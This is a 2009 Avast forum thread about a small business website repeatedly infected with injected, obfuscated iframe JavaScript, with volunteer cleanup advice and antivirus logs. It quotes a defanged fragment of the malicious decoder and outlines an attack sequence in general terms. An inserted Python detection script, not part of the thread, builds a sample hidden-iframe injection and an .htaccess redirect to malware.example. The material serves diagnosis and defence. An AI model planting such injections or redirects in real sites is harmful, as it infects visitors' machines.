Avast WEBforum

Other => Viruses and worms => Topic started by: MonsterKat on May 10, 2009, 07:32:15 PM

Title: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on May 10, 2009, 07:32:15 PM
Hey Everyone!

I went on my website today that I am the owner and web designer of, hxxp://www.valskidsline.com, and AVAST came on and said that it had the HTML:IFrame-EJ [trj] located on xxx.valskidsline.com, then seconds later it comes up again saying it's located in my Firefox cache. If I do this on IE, it says it's in the Temporary folder, obviously.

Now, I went on my FTP Control Panel, and the pop-up shows up there as well. I also went on Gensap.com, my website hosting service, and of course the pop-up is there as well. These are the only sites that it is showing up on; I can go on everything else.

I've tried to log into my Control panel, to check that out and find the virus, but once the Avast popup comes on, it prevents me from logging in.

I've sent an email to my tech support, and it being Sunday doesn't help. They are also quite slow at replying.

I have Avast Virus running right now, as well as Spybot and Ad-Aware.

Don't click on the link, unless you know what you are doing.

Any help I can get would be fantastic.

Edit: Avast Home Scan, Through Disk Scan was completed and no viruses were found. Or so it said anyways.

Happy Mothers Day to your moms!
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: Lisandro on May 10, 2009, 08:56:39 PM
Generally, avast detection is accurate in these cases.
Isn't it an encrypted/obfuscated script or iframe?
Wasn't the site hacked?
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 10, 2009, 09:04:26 PM
There is a large chunk of obfuscated script on the same single line, directly after the opening Body tag (two inserted script tags), so it looks like your site has been hacked.

Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: MonsterKat on May 10, 2009, 09:23:19 PM
Thanks a lot for your help guys. This is so disappointing, I'm good at making sites, but not so good at knowing how to fix or what to do in this situation as this has never happened before. What should I do next? The thing that would make sense to me is log into my cpanel, delete the files or clean them, then re-upload everything, right? Change my password info and all of that if it hasn't been already changed by the hacker. I try and go onto the cpanel but when the Avast comes up, I can't log into it, obviously. What else should I do?

Thanks very much everyone
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: Lisandro on May 10, 2009, 09:29:05 PM
I'm good at making sites, but not so good at knowing how to fix or what to do in this situation as this has never happened before.
Can you overwrite the files by uploading the new ones (maybe by FTP transfer) without having to log in to the site host?
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 10, 2009, 10:38:48 PM
Thanks a lot for your help guys. This is so disappointing, I'm good at making sites, but not so good at knowing how to fix or what to do in this situation as this has never happened before. What should I do next? The thing that would make sense to me is log into my cpanel, delete the files or clean them, then re-upload everything, right? Change my password info and all of that if it hasn't been already changed by the hacker. I try and go onto the cpanel but when the Avast comes up, I can't log into it, obviously. What else should I do?

Thanks very much everyone

You're welcome.


Commonly this happens because of vulnerabilities in the site content management software (PHP, SQL, WordPress, etc.) being exploited, usually because of old versions of the software. So you will need to talk to your Host for advice in that regard if it is them that provide this and ask about how they/you can secure your site to prevent future occurrences.

If avast gets in on the act when you open control panel, I take it this is server hosted?
If so then you would need Host help in resolving that. However, if you aren't actually running the file and the alert is the web shield then you could pause it. You would have to be extra careful and only be on-line as short a time as possible and enable the web shield again.

If as suggested you just upload and overwrite existing files by ftp, it is entirely possible they end up infected too as has happened in at least one topic that I remember.

This is by no means easy but the first thing is to change passwords for any area to do with uploading/modifying or controlling content, etc.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: Lisandro on May 10, 2009, 10:42:44 PM
Can you overwrite the files by uploading the new ones (maybe by FTP transfer) without having to log in to the site host?

If as suggested you just upload and overwrite existing files by ftp, it is entirely possible they end up infected too as has happened in at least one topic that I remember.

Sorry. Out of my knowledge limits  :-[
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: MonsterKat on May 10, 2009, 11:11:05 PM
David R hit the nail right on the end! You're very good at this haha, but I'm sure you already know that.  ;)

I emailed the host first thing when I found out that this had happened, telling them everything and this was the response. I was stunned to get a reply, I've had issues before and waited weeks for a response. Prompt isn't their forte.
I actually got a response!

Quote
We have patched up the server and we found a weakness in PHP which was helping aid the compromise of some domains. We updated it, and changed some default settings to help prevent these coding compromises. The weaknesses were not server wide but rather just made it easier on a hacker to compromise individual end user accounts.

I suggest the following clean up procedure for both your accounts:

1. Check all index pages for any signs of JavaScript injected into their coding. On Windows servers check any "default.aspx" or "default.cfm" pages as those are popular targets too.

2. Remove any "rogue" files or PHP scripts uploaded by the hackers into your account. Such scripts allowed them to make account wide changes, spam through your account, or spread their own .htaccess files through all of your domains in that end user.

3. Check all .htaccess files, as hackers like to load re-directs into them.

4. Change all passwords for that end user account. The cp password, the ftp password, and any ftp sub accounts. Make sure to use a "strong" password which includes upper case, lower case, numbers and NO COMPLETE WORDS OR NAMES!

This coupled with our server side changes should prevent any resurfacing of the hackers' efforts. In some cases you may still have coding which allows for injection. All user input fields, hidden or not, should be hard coded, filtered, and sanitized before being handed off to PHP or a database, which will prevent coding characters from being submitted and run through your software.

Thanks,

So I grabbed my guts and tried to log into the host server, so I could see the files. I was quite nervous that the trojan would start to download as soon as I signed in; the pop-up warnings from Avast and Ad-Aware were a sight to see. I went on real quickly, searched for any of the files that he had recommended, and did not see any. There were no files added, BUT my files were altered and the JavaScript was injected. I went in and edited the index.php & index.html and found the HUGE long injections. The one on index.php was loaded with links and all this crazy stuff, I deleted it and reloaded it. The index.html was all crazy with foreign letter and number combos of a JavaScript. I deleted that and re-uploaded it. I then went and looked on the site, and I no longer received any notifications on Avast or Ad-Aware and it looks perfectly normal. I am still looking through all of my pages and making sure nothing has been added. I will then change my passwords, and clear out my computer, run avast again, just to be safe.

I've always been kinda paranoid / better safe than sorry with everything, so I was shocked to say the least that this has happened. But it was a relief to know that this wasn't at my end, and more so the host's end.

Thank you everyone for your help, you're really awesome! I appreciate David showing me exactly where the problem was when he uploaded the picture. That was a big help for me.

Now that the pop-ups are all clear, is it safe to say the website has been taken care of?

Also, I just noticed this as I was typing this message. I went on my log-in page for the host, and the exact same pop-up is there! hxxp://cpanel2.page14.com and on hxxp://www.gensap.com - my host's site.

I emailed the host and told them this, but is this a problem caused by my computer or is it at their end? I'm not too sure.

Thanks everyone!
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 10, 2009, 11:38:20 PM
You're welcome.

Thanks for posting the response from the Host, it could help others (I have saved it as there is no identifying detail) in how they go about cleaning house. I too am pleasantly surprised by your Host's prompt and very helpful response, if only they were all like that instead of ignoring or blaming the user for giving out their passwords.

I don't believe the log-in page alerting has anything to do with your computer as a) this is a server side page, b) and c) you can't modify it because it isn't in your control. I could be wrong (don't think so though ;D), it has been a very long time since I did any web design and securing my site and importantly I didn't use any content management software.

So it may be that all the control panel log-in pages are contaminated by remnants of infected pages on the server side, this is exactly as the infected pages on your site, huge chunk of obfuscated javascript (again two script tags all on one line), see image.

Can you modify the links in your last post, change http to hXXp to avoid accidental exposure to malware.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: polonus on May 10, 2009, 11:41:36 PM
Hi MonsterKat,

Can't you please break the links you gave, like hxtp://suspicious-link.com or www dot suspicious-link dot com, so the curious aren't able to click these links. Why we hold this policy all over these webforums, you can read here where I have explained the reasons for this security principle: http://forum.avast.com/index.php?topic=45139.0

polonus
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: MonsterKat on May 11, 2009, 12:15:32 AM
Links are edited and I apologize. I made a mental note to edit them, and then I just simply forgot. Stupid me, I wouldn't want to cause any issues for anyone else, especially after receiving wonderful help.

I emailed the host and told them I have cleaned up the mess at my end, and pointed out the log in page and the main site being infected and I won't be logging into the server until they get it cleaned up, just in case. I managed to get on long enough to clean my site up, and that was it. It's not allowing me to log in anymore, so maybe they have started.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 11, 2009, 12:21:10 AM
No problem (one down, millions more to go, sorry in joke), we avast users feel a little immune to these types of attack, but it is just good practice not to have links active to suspect sites.

You are fortunate to have a Host that is somewhat more proactive than most, hopefully they are cleaning house also. Let us know how you get on.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: polonus on May 11, 2009, 11:50:08 PM
MonsterKat,

The site now seems OK: http://www.blacklistdoctor.com/bld/diagnose.php?URL=www.valskidsline.com&scan_id=5830
Unmask Parasites says: This page seems to be <clean>
Exploit Prevention Labs: LinkScanner says:
Congratulations! LinkScanner Online did not find any exploits.
Scanned: Monday, May 11, 2009


pol
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: MonsterKat on May 12, 2009, 11:11:08 PM
Thanks a lot Pol, that's a great help. I didn't know about that site, and I'm glad that I managed to find all the injected files. I can't thank everyone here for the help enough!

My host still has not replied to my email regarding the log in pages and their site being infected. The prompt reply they gave me was really a one hit wonder after all :P :P

So as of now, our site is clean but I can't log in and do anything further because they still haven't fixed it at their end. But our site is now good, and that's my major worry.

Thank-you everyone!
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 12, 2009, 11:24:01 PM
You're welcome.

After such a promising start by your Host :P
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: avuser007 on May 12, 2009, 11:37:31 PM
Thanks for the thread here guys.  Others (like me) have also experienced this exploit.

For your interest, a discussion is currently underway at my host (who is always very helpful) here:
http://support.jodohost.com/showthread.php?t=16472

If you use webalizer, check that too, as I found the exploit script also appeared in /webalizer/default.html.

It also seems to add a hacked .htaccess file to your root folder and your /webalizer folder.

HTH
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: MarkW on May 14, 2009, 04:25:58 AM
I'm having a very similar problem but avast is detecting HTML:IFrame-EE [trj] on 2 websites I need to work on made with cpanel. Some offending code has been found in the index pages and removed and the problem goes away but within a matter of hours this code has written itself back in. Can anyone tell me how to permanently remove this code?
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: avuser007 on May 14, 2009, 04:53:51 AM
^ That's interesting... we can work out where the vulnerability is.

Firstly, do you have Frontpage extensions enabled on those sites? If so, turn it off and see how that goes.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 14, 2009, 04:31:43 PM
I'm having a very similar problem but avast is detecting HTML:IFrame-EE [trj] on 2 websites I need to work on made with cpanel. Some offending code has been found in the index pages and removed and the problem goes away but within a matter of hours this code has written itself back in. Can anyone tell me how to permanently remove this code?

What comes after the iframe- is just a slightly different variant on the same hack, so that isn't really the issue, but to resolve why you were hacked, so I suggest you check out the quoted text in Reply #7 on page 1 of this topic. This is from his host on measures they have taken and measures he should take.

If you haven't already contacted your Host to report this (asking advice about how they/you can prevent a recurrence) as it is likely it could be affecting other sites hosted by them.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: markooff on May 18, 2009, 01:34:55 PM
Hi

I've just spotted this problem on one of my web forums (based on phpBB). I've found a JavaScript added after the closing PHP tag "?>" in several PHP files like index.php, login.php etc. These files all had the same modification dates. The result was the PHP error on the front page which said "Cannot modify header information - headers already sent ..."
Of course I got rid of these scripts, but have one question - did somebody copy the content of this JavaScript?
Could you copy and paste this here? (because I have archived the content of "my" scripts to compare them)

Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: DavidR on May 18, 2009, 04:49:18 PM
First ensure the forum PHP software is up to date as this looks like an exploit of the PHP software, old versions are vulnerable to attack/exploit.

I'm not sure what you mean by "did somebody copied the content of this java script" ?

The inserted code 'Script tags'

You should NOT post the code here as that could have avast alert on the forums, you could post an image of the code. I really don't believe that will help much as it would probably follow the same pattern of the other images I posted in the first page of this topic.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: polonus on May 18, 2009, 05:44:36 PM
Hi markooff,

Maybe you have an interesting read here, as there is PHP involved in the code injection from within:
http://blog.fortinet.com/code-injection-from-within/
jQuery ( http://jquery.com/ ) is a respectable and popular JavaScript library by John Resig (who's also a Mozilla employee).
The problem is that most sites embed it in its minified version (for bandwidth reasons), which makes differential fingerprinting from malicious obfuscated code OMG :shock: quite difficult.
Furthermore jquery-1.3.2.min.js can contain the recognition pattern of the JS/Dldr.Agent.Agr.1 JavaScript virus.
Index.js see: htxp://www.wolframalpha.com//common/jav ... 3.2.min.js is not something to show to the world and malcoders..
If the software code you have there is not fully updated and patched, or there is some old usable crap-code still somewhere laying around on that site, the hacker just needs a little maneuverability to perform these inline injection attacks outside HTML. You can check your whole site here: http://www.blacklistdoctor.com/bld/diagnose.php

Possible attack scenario, not your example necessarily...
1) The attacker finds a hole in your user's local PHP script
2) They inject their own PHP code from a remote file, making it run as if they are uploading the page through regular FTP.
3) There are various ways you can easily collect the usernames of accounts, extremely easily performed.
4) You can start to then bruteforce attacks on passwords of user accounts
5) You can then start scouring the server for local exploits and use them to your advantage. e.g.: the script you mentioned in that include checks to see if wget, gcc and other system binaries are on the system and accessible for the attacker to use.
6) With a list of whats installed and what they can use, they can now download hacks and start trying to crack your machine and compiling code attempting to gain root, etc.
7) They can search any and all 777 permission files/directories and inject whatever they feel like. Good times for them, crappy time for the site owners and server owners to clean up the mess after the site software was compromised.


Preventing this is a combination of things that I won't go into complete details about but I'll brief over so you get the idea.
1) Lock your system binaries, like wget, gcc, and others to stop anyone from using them.
2) Secure PHP by disabling functions used such as: proc_open, exec, system, passthru, etc..
3) Make sure PHP/Apache is up to date
4) Install mod_security and have CURRENT ruleset! Mod_security through cPanel install has NO rule-set! Use a rule-set that is handed out to all clients which was tried, tested and true.
5) Have a current kernel installed, there are many exploits that still work on a lot of providers.
There are tons of measures you can take to help lock your machine, so the hacker has less room to maneuver and turn you into a victim.

polonus
Title: Re: HTML:IFrame-EJ [Trj] Found on my website PLEASE HELP
Post by: MonsterKat on May 28, 2009, 10:46:36 PM
Hey everyone, me again.....unfortunately.

I'm quite upset with the happenings on my website. I got it all cleaned up at my end and now it's back. The Host has been no help at all and did not return my email when this happened before, nor have they cleaned up the control panel page. This is craziness. So because I was unable to change my password they did it all again.


Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: polonus on May 28, 2009, 11:03:31 PM
Hi MonsterKat,

Yep, the malcode is back there:
Code:
EDITED Heavily ^/head^^script type="text/j*v*script"v*r hdOruVsHnKBXZuvtsRmw = ^..........."z60z105z102z114z97z109z101z32z119z105z100z116z104z61z34z52z5 etc.....67z109z101z62";v*r kWiFaYwHrXtZBIQvdJDR = hdOruVsHnKBXZuvtsRmw.split("z");v*r TEptzkmsBZolwWqWunem = "";f*r (v*r KYLMhcILlLcFQRyPBlHD=1; ....KYLMhcILlLcFQRyPBlHD<kWiFaYwHrXtZBIQvdJDR.l*ngth; KYLMhcILlLcFQRyPBlHD++){TEptzkmsBZolwWqWunem+=Str*ng.fromCharCode(kWiFaYwHrXtZBIQvdJDR[KYLMhcILlLcFQRyPBlHD]);}document.write(TEptzkmsBZolwWqWunem)^/script^
Why the hoster or the webmaster there cannot clean up his act is beyond me; if you get your security issues presented on a platter by users, that is just the security world upside down: "Sign of "HTML:IFrame-EJ [Trj]" has been found in ----304_frame.php\{gzip} file". Also present them with these issues with the PHP version they are using: http://secunia.com/advisories/product/3194/?task=advisories

polonus
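The host's cleanup checklist quoted earlier (check index pages for injected script, look for .htaccess redirects) and the edited malcode above, which stores its payload as "z"-separated character codes and rebuilds it with String.fromCharCode and document.write, can be turned into a small triage script. This is an added example, not code from the thread, the host or avast; the page contents and the malware.example address it checks are constructed samples.

```python
"""Triage helper for the injected-script pattern discussed in this thread.

Added example, not code from the thread, the host or avast. It checks page
sources (constructed samples below, not the real site) for three things the
thread describes: the obfuscated split("z") + String.fromCharCode +
document.write decoder in the posted malcode, a script tag appended after a
closing PHP tag (the "headers already sent" symptom), and an .htaccess file
that redirects visitors to an external URL.
"""
import re
from typing import List, Optional

# The posted sample stores its payload as "z60z105z102..." (char codes joined
# by a separator letter), splits on the letter, rebuilds the text with
# String.fromCharCode and writes it into the page with document.write.
ENCODED_STRING = re.compile(r'"((?:z\d{1,3}){8,})"')
DECODER_MARKERS = ("split(", "fromCharCode", "document.write")

# Script placed directly after the closing PHP tag, as markooff described.
SCRIPT_AFTER_PHP_CLOSE = re.compile(r"\?>\s*<script\b", re.IGNORECASE)

# Rewrite/redirect rules in .htaccess that send visitors to another host.
HTACCESS_REDIRECT = re.compile(
    r"^\s*(?:RewriteRule|Redirect(?:Match)?)\b.*https?://",
    re.IGNORECASE | re.MULTILINE,
)


def decode_charcode_string(encoded: str, sep: str = "z") -> str:
    """Reverse the split(sep) + fromCharCode trick: "z60z105" -> "<i".

    The malcode loop starts at index 1 because split("z") on a string that
    begins with "z" yields a leading empty element; dropping empties here
    gives the same result.
    """
    return "".join(chr(int(code)) for code in encoded.split(sep) if code)


def find_injection(source: str) -> Optional[str]:
    """Return the decoded payload if the obfuscated decoder pattern is present."""
    if not all(marker in source for marker in DECODER_MARKERS):
        return None
    match = ENCODED_STRING.search(source)
    return decode_charcode_string(match.group(1)) if match else None


def triage(name: str, source: str) -> List[str]:
    """Run the three checks over one file's content and describe what was found."""
    findings = []
    payload = find_injection(source)
    if payload is not None:
        findings.append(f"obfuscated document.write payload decodes to: {payload}")
    if SCRIPT_AFTER_PHP_CLOSE.search(source):
        findings.append("script tag appended after the closing ?> tag")
    if name.endswith(".htaccess") and HTACCESS_REDIRECT.search(source):
        findings.append(".htaccess redirects visitors to an external URL")
    return findings


def encode_charcode_string(text: str, sep: str = "z") -> str:
    """Build a "z60z105..." string; used only to construct the sample below."""
    return "".join(f"{sep}{ord(ch)}" for ch in text)


# Constructed samples (hypothetical; the hidden iframe points at a reserved
# example domain, not at anything seen in the thread).
SAMPLE_PAYLOAD = '<iframe src="http://malware.example/" width="1" height="1"></iframe>'
INJECTED_INDEX_PHP = (
    "<?php echo 'Welcome'; ?>"
    '<script type="text/javascript">var hd = "'
    + encode_charcode_string(SAMPLE_PAYLOAD)
    + '";var kw = hd.split("z");var out = "";'
    "for (var i = 1; i < kw.length; i++) { out += String.fromCharCode(kw[i]); }"
    "document.write(out)</script>"
)
CLEAN_HTML = (
    '<html><head><script src="jquery-1.3.2.min.js"></script></head>'
    "<body><p>Nothing suspicious here.</p></body></html>"
)
BAD_HTACCESS = "RewriteEngine On\nRewriteRule ^(.*)$ http://malware.example/$1 [R,L]\n"
CLEAN_HTACCESS = "RewriteEngine On\nRewriteRule ^old/(.*)$ /new/$1 [L]\n"

if __name__ == "__main__":
    for name, source in [
        ("index.php", INJECTED_INDEX_PHP),
        ("index.html", CLEAN_HTML),
        ("webalizer/.htaccess", BAD_HTACCESS),
        (".htaccess", CLEAN_HTACCESS),
    ]:
        print(name, "->", triage(name, source) or "no findings")
```

Run it against the real files by reading each file into `source`; the decoded payload tells you what the script writes into the page, which is far more useful than the raw character codes when reporting to the host.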
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on May 31, 2009, 11:29:20 PM
I have yet to get any kind of reply from my host and I am in the process of shopping around for another host right now. BUT for the time being I cannot afford to lose any business that the website is bringing in.

Now, my question is this.

Is it a bad idea to very quickly turn off avast and sign into the user panel, delete the virus off of my website and then change my password, then log out of the control panel and turn avast back on, followed with a virus scan?

My host clearly doesn't give a rat's behind about this and their control panels and servers being infected. I just want my customers to be able to use my website and not get infected.

I can understand that this would be very risky for me to do, but I don't think I have any other option.

I don't use FTP, so that's not a route I can go...


Thanks a lot
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: polonus on May 31, 2009, 11:39:37 PM
Hi MonsterKat,

This could be done as you propose, but I would still perform it from a Mozilla browser like Firefox with the NoScript extension and RequestPolicy installed and active. NoScript will protect you from evil scripts running; if you have to have JavaScript active, then prohibit requests to other domains than yours by using the RequestPolicy add-on.
RequestPolicy add-on can be found here: https://addons.mozilla.org/en-US/firefox/addon/9727/
NoScript here: https://addons.mozilla.org/nl/firefox/addon/722
Check your code from here: http://www.selfseo.com/html_source_view.php
Or do it through webbug from Amman software: http://www.cyberspyder.com/webbug.html
That program is made to do this and you can leave avast on, and perform your tasks as planned without further ado...

polonus
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on May 31, 2009, 11:46:18 PM
This is great, I already use Firefox so getting those add-ons will be a quick job. I'll be doing this right now, thanks very much!

Now I know this is unrelated to a virus, but I have a quick question. Does anyone know if godaddy.com is reputable? How would I go about making sure they have the newest and safest versions of things so I know this doesn't happen again. Go Daddy is apparently one of the most popular for webhosting and I realize I'm just being paranoid. But I just want to make sure..... lol



That  graphic of yours is pretty impressive lol. Reminds me of my cats haha.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: polonus on May 31, 2009, 11:55:41 PM
Hi MonsterKat,

GoDaddy's reputation was not always stellar, but they recently acquired a better reputation.
Did you get the webbug tool as well? See attached what you get back there.

polonus
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: avuser007 on June 02, 2009, 11:38:42 AM
MonsterKat, try looking at JodoHost, that's where I host my clients' sites.
Great support, very reliable and "mature" service.

I think what we've experienced here is the "Gumblar" exploit.
Code:
http://blog.unmaskparasites.com/2009/05/07/gumblar-cn-exploit-12-facts-about-this-injected-script/
It seems to behave in a similar way and is currently doing the rounds quite effectively. It does indeed steal FTP and other site credentials on infected PCs. The exploit is based on a vulnerability in Adobe apps incl. Flash. Recommendations are to install the latest Adobe stuff which has now patched the holes.

I'm pretty convinced this is how it happened for me. Can't think of another way my client's simple, HTML-only, non-DW, non-FP site could have been modified so extensively other than by FTP, via this exploit. Far more probable than a compromised hosting provider.

So check your PCs for Gumblar, update to the latest Adobe versions and see how it goes.

[ed] code'd the link, sorry.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: polonus on June 02, 2009, 09:44:19 PM
Oh avuser2007,

Cannot you make the link you put up there non-clickable by changing to hXtp for instance etc.? The Unmask Parasites site has the script there unedited (which actually is stupid) so avast flags it. If we put malcode script here for instance we edit the code heavily ( <> gets ^^ and with breaks ...... or j*vascript for instance) so it cannot run, or we publish only part of it - only so webmasters can trace it themselves; also a secure way is to publish it as a screendump image,

polonus
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on June 03, 2009, 05:03:07 AM
Alright so here is my update, It makes no sense to me but you guys are smarter so hopefully this helps....

I went on and did everything I was supposed to and used RequestPolicy and NoScript, I edited the index page and saved it. Then I got off and reset Firefox to view the website and the warning on avast came on again.

Now I have come across a new thing,

My mom (who is Val, obviously, with Val's Kids Line) has been in talks with a customer via email. Every time she clicks on the email from the customer, the exact same alert comes up from avast. The email from her has an attachment attached to it BUT it has never been downloaded. The attachment is called stat3199.jpg. I don't think the attachment being shown has anything to do with it because it's never been downloaded. This is a trusted customer so I know that she didn't do this. I am very confused as to why when I read an email from her that warning comes up.

The email address she uses is NOT a website server email address it is a yahoo.ca address that she has always used.

Any ideas?

Thanks guys!
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: avuser007 on June 03, 2009, 08:14:56 AM
Every time she clicks on the email from the customer, the exact same alert comes up from avast. The email from her has an attachment attached to it BUT it has never been downloaded.

Avast is probably scanning the attachment via the link to it in the email. A friend of mine was recently infected with Gumblar via a fake Facebook "you've been friended" email.

Simple answer - delete the attachment.  And NO sender is "trusted". Unless you 100% trust the sender isn't infected with trojans on their own PC. Just because you trust the person doesn't mean you can trust their PC. :)
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: DavidR on June 03, 2009, 03:29:24 PM
Not sure what index page you are talking about. If you are editing the control panel index page then that would revert to that served up by the Host. If the Hosts end is infected then it is highly likely that it will continue to infect sites that it hosts.

Now I have come across a new thing,

Every time she clicks on the email from the customer, the exact same alert comes up from avast. The email from her has an attachment attached to it BUT it has never been downloaded.

I somehow doubt it is 'exactly' the same message as the Internet Mail provider's messages differ from those of the web shield, so we really need to know the full error message. Check the avast! Log Viewer (right click the avast 'a' icon), Warning section, this contains information on all avast detections. C:\Program Files\Alwil Software\Avast4\ashLogV.exe
- Or check the source file using notepad C:\Program Files\Alwil Software\Avast4\DATA\log\Warning.log.

I also suggest that you create a new topic for this or it will just confuse this topic.
Title: Re: HTML:IFrame-EJ [Trj] Found on my website( It's back!)
Post by: MonsterKat on June 03, 2009, 06:12:42 PM
Quote

5/10/2009 11:42:01 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 11:52:19 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 11:52:57 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 11:54:42 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 11:54:51 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 11:55:07 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 11:55:13 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 11:57:29 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 11:57:47 AM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 12:05:59 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 12:06:08 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 12:21:57 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\EADEA65Ad01" file. 
5/10/2009 12:22:05 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://gensap.com/Contact/Default.aspx" file. 
5/10/2009 12:22:19 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.gensap.com/" file. 
5/10/2009 12:22:43 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\BB323658d01" file. 
5/10/2009 12:27:01 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 12:27:10 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Temporary Internet Files\Content.IE5\PL3V19GI\valskidsline_com[1].htm" file. 
5/10/2009 12:30:22 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 12:30:39 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 12:35:17 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 12:35:17 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 3:55:46 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://cpanel2.page14.com/" file. 
5/10/2009 4:01:31 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/" file. 
5/10/2009 4:01:35 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "C:\Documents and Settings\Administrator.MOMS\Local Settings\Application Data\Mozilla\Firefox\Profiles\c6ugp8fp.default\Cache\1F995C4Bd01" file. 
5/10/2009 4:29:30 PM   SYSTEM   1360   Sign of "HTML:IFrame-EJ [Trj]" has been found in "hxxp://www.valskidsline.com/index.php" file. 
